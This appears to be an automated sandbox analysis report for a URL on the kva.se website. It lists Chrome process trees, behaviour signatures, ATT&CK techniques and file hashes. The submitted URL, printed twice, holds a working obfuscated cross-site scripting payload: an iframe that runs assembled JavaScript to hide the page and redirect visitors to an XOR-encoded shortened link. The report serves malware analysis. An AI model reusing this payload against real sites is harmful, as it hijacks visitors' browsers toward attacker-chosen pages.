Overview

overview

10

Static

static

1

URLScan

urlscan

10

https://www.kva.se/?...

windows10-2004-x64

1

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-02-2024 18:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://www.kva.se/?s=%%22%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get=%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60.fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef=url.map(value=%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()%2A%2F%60;codeString=codeString.replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep.over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max.do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;%3E%3C%2Fspan%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder.setElementByCode(socar~ar)

Score
1/10

Malware Config

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.kva.se/?s=%%22%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get=%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60,%605%60)%20%C2%A7connect=%60hola%60.fix()%22%3E%3Ciframe%20src=javascript%3A%2F%2Afd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch%2A%2FcodeString=%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city=0;url=%5B66,94,94,90,89,16,5,5,73,95,94,94,4,70,83,5,31,93,104,121,88,108,77,89%5D;%2F%2Athat%5B~7el~%5D(setInterval,hara)laard%C2%A73000zblaalo%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef=url.map(value=%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27);%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()%2A%2F%60;codeString=codeString.replaceAll(%60salooa%60,%60azefcr%60);executeCode=Function(codeString);%2F%2Athat%5B~ovrir~%5D(sessionStorage,_selve)sleep.over%C2%A7%2A%2FexecuteCode();%2F%2A%C2%A7max.do()%2A%2F%3E%3C%2Fiframe%3E%3Cspan%20style=%60display:block;position:fixed;z-index:997483649;top:0;left:0;width:2000px;height:2000px;backgroundcolor:white;%3E%3C%2Fspan%3E%7CCryptography%20menu.get=mime%20%C2%A7intelligence.start(dispatchEvent)%20lib%20%C2%A7computing(start).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake=%20redo)%C2%A7%20onstart%20attitudelocal_marine%C2%A7%20folder.setElementByCode(socar~ar)
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:816
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7a39758,0x7ff8f7a39768,0x7ff8f7a39778
      2⤵
        PID:1156
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:2
        2⤵
          PID:900
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2168 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:8
          2⤵
            PID:2584
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:8
            2⤵
              PID:3708
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3076 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
              2⤵
                PID:3456
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                2⤵
                  PID:3400
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4904 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                  2⤵
                    PID:4588
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4100 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                    2⤵
                      PID:3536
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3460 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                      2⤵
                        PID:4988
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:8
                        2⤵
                          PID:4376
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3448 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:8
                          2⤵
                            PID:3416
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3236 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                            2⤵
                              PID:2864
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3948 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                              2⤵
                                PID:780
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3900 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                                2⤵
                                  PID:1976
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4092 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                                  2⤵
                                    PID:3952
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=1060 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                                    2⤵
                                      PID:1444
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2300 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:2
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2180
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=2304 --field-trial-handle=1844,i,15424864886565148642,14230388114121640827,131072 /prefetch:1
                                      2⤵
                                        PID:4772
                                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                      1⤵
                                        PID:228

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v13

                                      Initial Access

                                      Execution

                                      Persistence

                                      Privilege Escalation

                                      Defense Evasion

                                      Credential Access

                                      Discovery

                                      Query Registry

                                      1
                                      T1012

                                      System Information Discovery

                                      1
                                      T1082

                                      Lateral Movement

                                      Collection

                                      Exfiltration

                                      Command and Control

                                      Impact

                                      Resource Development

                                      Reconnaissance

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\38566a8a-35b4-4a97-913a-f717863f7cfa.tmp
                                        Filesize

                                        130KB

                                        MD5

                                        d7af37a68cb5d036d467a356e8b0a60d

                                        SHA1

                                        81c573f22c2193356bab4655a24c7dbe0080757b

                                        SHA256

                                        dab5666f298181704f1e4a5c61d8e74af4055f3c70ddeb176d3e9d9ff7af0894

                                        SHA512

                                        df7cce90d9a2fbc9c34d2efc9d2f677f56696db385328bb8da7614888a888dc28bb691965baedb5d467cad992cb8f2ed42516498303cda43434169a5e66cdef5

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
                                        Filesize

                                        120B

                                        MD5

                                        609c0236830c15464566f9c94e16dfc0

                                        SHA1

                                        184a11d7910c0aa9693364029c3318dc0378c450

                                        SHA256

                                        bc4739b73ec4810dcafc51f613eee9388468ad8fe9753a3a15adb623e0767ea0

                                        SHA512

                                        3dfb74c1c105332fac8743b8b5b27a2a161f8e7b66e632d306efac5d05dc8729957479adba9c6f7f60090dc12231b96f8673e43e4b00eabfe00bc753bfbacce8

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                        Filesize

                                        1KB

                                        MD5

                                        8bd7f6ca30f3331a9b1f98438eb022a9

                                        SHA1

                                        7532ecaa779f518c275f51457a4f26d131eb973e

                                        SHA256

                                        6e4a5be098e4554885a831f685df964d560ea086b798f40ae9ac1ca1505592b2

                                        SHA512

                                        49aaad409f0d8d8374b9ebcf256125684ae7ca383afd68c417b137656dd59c3c389f6599f7e0214ac961e44ca44d850ef10777b3b462d06058557e64606700cd

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                        Filesize

                                        872B

                                        MD5

                                        7fab4a00ea0d756e912a575c7bd3c0af

                                        SHA1

                                        463009af056155fa2bee0914a2be75c10e1bf25d

                                        SHA256

                                        0f7d59a69862d8bfef99cc2b388ffdfa2813b255174b13331ba5aa31f3b42324

                                        SHA512

                                        f3b839fe9ae84286e8a54f9347d2671a794da9b3f7934862a4d6b40ac39636c713ac0777dce9ca2dbba750e8341bb4ccc67867836276ab8061eff9f61bd03193

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                        Filesize

                                        6KB

                                        MD5

                                        143a19ac9441449251cc0cd2dd49c78f

                                        SHA1

                                        da83591c1153aa8a49a11b1700ab0a12b492309d

                                        SHA256

                                        3957d40014e3526ae65ab270b97cddee6c2103acf5409f4e1e462a86dd8c8fb5

                                        SHA512

                                        8b910ed4b6f0e3372ecf0e963893e1d16e9c8a3d6aac9b6fd8a8baf668248e9743dec59b280fa1e77dffd2192aaff588ef9e5565eed89630c16f31d3bfee95e4

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
                                        Filesize

                                        2B

                                        MD5

                                        99914b932bd37a50b983c5e7c90ae93b

                                        SHA1

                                        bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                        SHA256

                                        44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                        SHA512

                                        27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                        Download Submit
                                      • \??\pipe\crashpad_816_NBKAKBUZCKEPOHCL
                                        MD5

                                        d41d8cd98f00b204e9800998ecf8427e

                                        SHA1

                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                        SHA256

                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        SHA512

                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                        Download Submit